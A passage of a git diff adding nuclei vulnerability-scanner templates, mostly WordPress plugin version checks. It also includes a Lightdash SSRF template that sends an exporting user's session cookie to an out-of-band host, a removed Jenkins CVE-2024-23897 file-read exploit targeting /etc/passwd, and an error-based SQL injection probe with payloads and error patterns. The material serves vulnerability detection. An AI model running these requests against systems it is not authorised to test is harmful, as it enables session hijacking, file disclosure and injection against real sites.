'vuln:CVE-2024-6332' + tags: cve,wordpress,wp-plugin,ameliabooking,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ameliabooking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ameliabooking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6586.yaml b/nuclei-templates/CVE-2024/CVE-2024-6586.yaml new file mode 100644 index 0000000000..49ddcb9cab --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6586.yaml @@ -0,0 +1,100 @@ +id: CVE-2024-6586 + +info: + name: Lightdash v0.1024.6 - Server-Side Request Forgery + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions. + reference: + - https://github.com/google/security-research/security/advisories/GHSA-4h7x-6vxh-7hjf + - https://nvd.nist.gov/vuln/detail/CVE-2024-6586 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N + cvss-score: 7.3 + cve-id: CVE-2024-6586 + cwe-id: CWE-201 + cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* + metadata: + max-request: 5 + verified: true + shodan-query: title:"Lightdash" + vendor: lightdash + product: lightdash + tags: cve,cve2024,lightdash,ssrf,oast,authenticated + +flow: http(1) && http(2) && http(3) && http(4) && http(5) + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /api/v1/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"email":"{{username}}","password":"{{password}}"} + + - raw: + - | + GET /api/v1/org/projects HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: projectuuid + part: body + json: + - '.results[0].projectUuid' + internal: true + + - raw: + - | + POST /api/v1/projects/{{projectuuid}}/dashboards HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name":"Test","description":"Test","tiles":[]} + + extractors: + - type: json + name: dashuuid + part: body + json: + - '.results.uuid' + internal: true + + - raw: + - | + PATCH /api/v1/dashboards/{{dashuuid}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"tiles":[{"uuid":"00000000-0000-0000-0000-000000000000","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"\n\nimg\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"} + + matchers: + - type: word + part: body + words: + - '"status":"ok"' + internal: true + + - raw: + - | + POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"queryFilters":"","gridWidth":1400} + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "http")' + - 'contains(interactsh_request, "connect.sid=")' + - 'contains(body, "status\":\"ok")' + condition: and +# digest: 490a0046304402203501a2e9b61fc6407a2b8af2d9608911e8d62299b4d0110fcb68aaee141b214c02204ebebd65520e307896a190c2dc05563006d67f1b70150846e7c3809d944e886c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6835.yaml b/nuclei-templates/CVE-2024/CVE-2024-6835.yaml new file mode 100644 index 0000000000..cf5cc32773 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6835.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6835 + +info: + name: > + Ivory Search – WordPress Search Plugin <= 5.5.6 - Information Exposure via AJAX Search Form + author: topscoder + severity: medium + description: > + The Ivory Search – WordPress Search Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.5.6 via the ajax_load_posts function. This makes it possible for unauthenticated attackers to extract text data from password-protected posts using the boolean-based attack on the AJAX search form + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/013f7c26-8348-4c54-af61-473a720a5095?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6835 + metadata: + fofa-query: "wp-content/plugins/add-search-to-menu/" + google-query: inurl:"/wp-content/plugins/add-search-to-menu/" + shodan-query: 'vuln:CVE-2024-6835' + tags: cve,wordpress,wp-plugin,add-search-to-menu,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/add-search-to-menu/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "add-search-to-menu" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.5.6') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6894.yaml b/nuclei-templates/CVE-2024/CVE-2024-6894.yaml new file mode 100644 index 0000000000..5b3b225647 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6894.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6894 + +info: + name: > + RD Station <= 5.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The RD Station plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping of post metaboxes added by the plugin. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa5075a8-1da1-4738-ad4b-b6c323d772ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6894 + metadata: + fofa-query: "wp-content/plugins/integracao-rd-station/" + google-query: inurl:"/wp-content/plugins/integracao-rd-station/" + shodan-query: 'vuln:CVE-2024-6894' + tags: cve,wordpress,wp-plugin,integracao-rd-station,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/integracao-rd-station/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "integracao-rd-station" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.3.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6929.yaml b/nuclei-templates/CVE-2024/CVE-2024-6929.yaml new file mode 100644 index 0000000000..37f78a6a76 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6929.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6929 + +info: + name: > + Dynamic Featured Image <= 3.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via dfiFeatured Parameter + author: topscoder + severity: low + description: > + The Dynamic Featured Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘dfiFeatured’ parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6700e926-21c1-45c9-bca9-62ef0218e998?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6929 + metadata: + fofa-query: "wp-content/plugins/dynamic-featured-image/" + google-query: inurl:"/wp-content/plugins/dynamic-featured-image/" + shodan-query: 'vuln:CVE-2024-6929' + tags: cve,wordpress,wp-plugin,dynamic-featured-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dynamic-featured-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dynamic-featured-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7380.yaml b/nuclei-templates/CVE-2024/CVE-2024-7380.yaml new file mode 100644 index 0000000000..914805ad93 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7380.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7380 + +info: + name: > + Geo Controller <= 8.6.9 - Missing Authorization to Authenticated (Subscriber+) Menu Creation/Deletion + author: topscoder + severity: low + description: > + The Geo Controller plugin for WordPress is vulnerable to unauthorized menu creation/deletion due to missing capability checks on the ajax__geolocate_menu and ajax__geolocate_remove_menu functions in all versions up to, and including, 8.6.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create or delete WordPress menus. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/280e1b4d-08be-4e77-abcb-5f9079111595?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7380 + metadata: + fofa-query: "wp-content/plugins/cf-geoplugin/" + google-query: inurl:"/wp-content/plugins/cf-geoplugin/" + shodan-query: 'vuln:CVE-2024-7380' + tags: cve,wordpress,wp-plugin,cf-geoplugin,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf-geoplugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf-geoplugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.6.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7381.yaml b/nuclei-templates/CVE-2024/CVE-2024-7381.yaml new file mode 100644 index 0000000000..2b6b90a24a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7381.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7381 + +info: + name: > + Geo Controller <= 8.6.9 - Missing Authorization to Unauthenticated Shortcode Execution + author: topscoder + severity: high + description: > + The Geo Controller plugin for WordPress is vulnerable to unauthorized shortcode execution due to missing authorization and capability checks on the ajax__shortcode_cache function in all versions up to, and including, 8.6.9. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ed7b13a-eec3-4035-8815-15228fb05af1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7381 + metadata: + fofa-query: "wp-content/plugins/cf-geoplugin/" + google-query: inurl:"/wp-content/plugins/cf-geoplugin/" + shodan-query: 'vuln:CVE-2024-7381' + tags: cve,wordpress,wp-plugin,cf-geoplugin,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf-geoplugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf-geoplugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.6.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7605.yaml b/nuclei-templates/CVE-2024/CVE-2024-7605.yaml new file mode 100644 index 0000000000..6b62999cdf --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7605.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7605 + +info: + name: > + HelloAsso <= 1.1.10 - Missing Authorization to Authenticated (Contributor+) Limited Options Update + author: topscoder + severity: low + description: > + The HelloAsso plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ha_ajax' function in all versions up to, and including, 1.1.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to update plugin options, potentially disrupting the service. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1690631b-0e5d-45d1-9db6-6ac426874762?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L + cvss-score: 4.3 + cve-id: CVE-2024-7605 + metadata: + fofa-query: "wp-content/plugins/helloasso/" + google-query: inurl:"/wp-content/plugins/helloasso/" + shodan-query: 'vuln:CVE-2024-7605' + tags: cve,wordpress,wp-plugin,helloasso,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/helloasso/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "helloasso" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.10') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7627.yaml b/nuclei-templates/CVE-2024/CVE-2024-7627.yaml new file mode 100644 index 0000000000..a0cc6c9c5b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7627.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7627 + +info: + name: > + Bit File Manager 6.0 - 6.5.5 - Unauthenticated Remote Code Execution via Race Condition + author: topscoder + severity: critical + description: > + The Bit File Manager plugin for WordPress is vulnerable to Remote Code Execution in versions 6.0 to 6.5.5 via the 'checkSyntax' function. This is due to writing a temporary file to a publicly accessible directory before performing file validation. This makes it possible for unauthenticated attackers to execute code on the server if an administrator has allowed Guest User read permissions. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f29de7a-3f15-4b6d-aad7-6a08151e2113?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-7627 + metadata: + fofa-query: "wp-content/plugins/file-manager/" + google-query: inurl:"/wp-content/plugins/file-manager/" + shodan-query: 'vuln:CVE-2024-7627' + tags: cve,wordpress,wp-plugin,file-manager,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "file-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 6.0', '<= 6.5.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8363.yaml b/nuclei-templates/CVE-2024/CVE-2024-8363.yaml new file mode 100644 index 0000000000..d2d23b5be5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8363.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8363 + +info: + name: > + Share This Image <= 2.02 - Authenticated (Contributor+) Stored Cross-Site Scripting via STI Buttons Shortcode + author: topscoder + severity: low + description: > + The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's STI Buttons shortcode in all versions up to, and including, 2.02 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d01b6056-a38d-4a60-9cdc-68663aa2aed6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8363 + metadata: + fofa-query: "wp-content/plugins/share-this-image/" + google-query: inurl:"/wp-content/plugins/share-this-image/" + shodan-query: 'vuln:CVE-2024-8363' + tags: cve,wordpress,wp-plugin,share-this-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "share-this-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.02') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/cve-2024-23897.yaml b/nuclei-templates/CVE-2024/cve-2024-23897.yaml deleted file mode 100644 index 62a1aba442..0000000000 --- a/nuclei-templates/CVE-2024/cve-2024-23897.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2024-23897 - -info: - name: Jenkins < 2.441 - Arbitrary File Read - author: iamnoooob,rootxharsh,pdresearch - severity: high - description: | - Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. - reference: - - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 - - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ - - https://github.com/Mr-xn/Penetration_Testing_POC - - https://github.com/forsaken0127/CVE-2024-23897 - - https://github.com/nomi-sec/PoC-in-GitHub - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2024-23897 - epss-score: 0.41536 - epss-percentile: 0.97188 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* - metadata: - verified: true - max-request: 1 - vendor: jenkins - product: jenkins - shodan-query: "product:\"Jenkins\"" - tags: cve,cve2024,lfi,rce,jenkins -variables: - payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" - -javascript: - - code: | - let m = require('nuclei/net'); - let name=(Host.includes(':') ? Host : Host+":80"); - let conn,conn2; - try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)} - conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n'); - try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)} - conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body) - resp = conn.RecvString(1000) - args: - Body: "{{payload}}" - Host: "{{Hostname}}" - - matchers: - - type: dsl - dsl: - - 'contains(response, "No such agent \"")' - - extractors: - - type: regex - group: 1 - regex: - - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/0xelkotsqli.yaml b/nuclei-templates/Other/0xelkotsqli.yaml new file mode 100644 index 0000000000..d39d68d605 --- /dev/null +++ b/nuclei-templates/Other/0xelkotsqli.yaml @@ -0,0 +1,482 @@ +id: error-based-sql-injection + +info: + name: Error based SQL injection [Edit] + author: geeknik,0xelkot + severity: high + description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli,generic,error + +requests: + - method: GET + path: + - "{{BaseURL}}'" + - '{{BaseURL}}"' + - "{{BaseURL}}+" + - "{{BaseURL}}-" + - "{{BaseURL}}*" + - "{{BaseURL}}[]" + - "{{BaseURL}}')" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - 